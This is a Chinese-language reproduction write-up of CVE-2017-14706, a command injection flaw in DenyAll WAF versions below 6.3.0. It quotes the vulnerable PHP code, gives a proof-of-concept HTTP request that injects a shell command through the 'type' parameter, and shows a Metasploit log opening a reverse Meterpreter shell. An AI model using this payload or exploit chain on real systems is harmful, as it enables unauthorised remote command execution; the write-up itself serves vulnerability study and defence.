（CVE-2017-14706）DenyAll_WAF___6.3.0_远程命令执行漏洞

# （CVE-2017-14706）DenyAll WAF < 6.3.0 远程命令执行漏洞 =============== 一、漏洞简介 ------------ 二、漏洞影响 ------------ DenyAll WAF \< 6.3.0 三、复现过程 ------------ ### 漏洞分析 其实，DenyAll WAF中存在多处命令注入，其中一处为/webservices/stream/tail.php，以下是其中的一段代码： if(isset($_REQUEST['iToken'])){ if($local->getIToken()!=$_REQUEST[‘iToken’]){
exitPrint(t_(“Bad key, authentication on slave streaming server failed”));
}
}else{
exitPrint(t_(“Authentication on slave streaming server failed”));
}
if(isset($_REQUEST[‘tag’]) && $_REQUEST[‘tag’]!=”){
// on doit chercher le bon fichier
if(isset($_REQUEST[‘stime’])&&$_REQUEST[‘stime’]!=”){ // Start time version
tailDateFile();
}else{ // dernier fichier ouvert
if($_REQUEST[‘tag’]==’tunnel’) $_REQUEST[‘file’]=basename(shell_run(“ls -1t “.__RP_LOG__.”*/”.$_REQUEST[‘uid’].”/*-“.$_REQUEST[‘type’].”.log| head -n1 2>/dev/null”));
else $_REQUEST[‘file’]=$_REQUEST[‘uid’].’-‘.$_REQUEST[‘type’].’.log’;
}
}

在iToken可被泄露的情况下，这里又出现了另一个函数tailDateFile()，以下是其具体代码：

function tailDateFile(){
global $_REQUEST;
$stime=(int)($_REQUEST[‘stime’]/1000);
$tag=$_REQUEST[‘tag’];
$uid=$_REQUEST[‘uid’];
$type=$_REQUEST[‘type’]; // access or error
chdir(__RP_LOG__);
if($tag==’tunnel’){ // reverse proxy
$files=shell_run(“ls -1 */$uid/*-$type-*.log 2>/dev/null|sort”).”\n”; // avec date trié au début
$files.=shell_run(“ls -1t */$uid/*-$type.log 2>/dev/null”); // courant trié par utilisation
}else{
$files=shell_run(“ls -1 $uid-$type*-log 2>/dev/null|sort”).”\n”;
$files.=shell_run(“ls -1t $uid-$type.log 2>/dev/null”);
}
// .. CODE OMITTED ..
}

从以上代码可以看到，\$uid参数可被控制，而且它还是shell\_run()函数变量的一部分。结合上述提及的这两方面问题，我们就能实现未授权命令注入漏洞。

### PoC

通过HTTP请求触发远程RCE实现：

GET /webservices/stream/tail.php?iToken=y760e0299ba6fc1a2739df5a8f64fc5a&tag=tunnel&stime=aaa&type=aaa$(sleep%2030″) HTTP/1.1
Host: www.0-sec.org:3001
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Cookie: connect.sid=s%3AWGBO5SaeECriIG8z4SMjwilZgl7SM0ej.0hGC0CcXrwnoJLb4YucLi8lbr%2FC8f2TNIicG4EmFLFU
Connection: close
Upgrade-Insecure-Requests: 1

### Metasploit反弹控制模块

https://github.com/rapid7/metasploit-framework/pull/8980

msf exploit(denyall_exec) > set RHOST 35.176.123.128
RHOST => 35.176.123.128
msf exploit(denyall_exec) > set LHOST 35.12.3.3
LHOST => 35.12.3.3
msf exploit(denyall_exec) > check
[*] 35.176.123.128:3001 The target appears to be vulnerable.
msf exploit(denyall_exec) > exploit
[-] Handler failed to bind to 35.12.3.3:4444:- –
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] Extracting iToken value from unauthenticated accessible endpoint.
[+] Awesome. iToken value = n84b214ad1f53df0bd6ffa3dcfe8059a
[*] Trigerring command injection vulnerability with iToken value.
[*] Sending stage (40411 bytes) to 127.0.0.1
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:60556) at 2017-09-19 14:31:52 +0300

meterpreter > pwd
/var/log/denyall/reverseproxy
meterpreter > exit
[*] Shutting down Meterpreter…
[*] 172.31.11.218 – Meterpreter session 1 closed. Reason: User exit
msf exploit(denyall_exec) > exit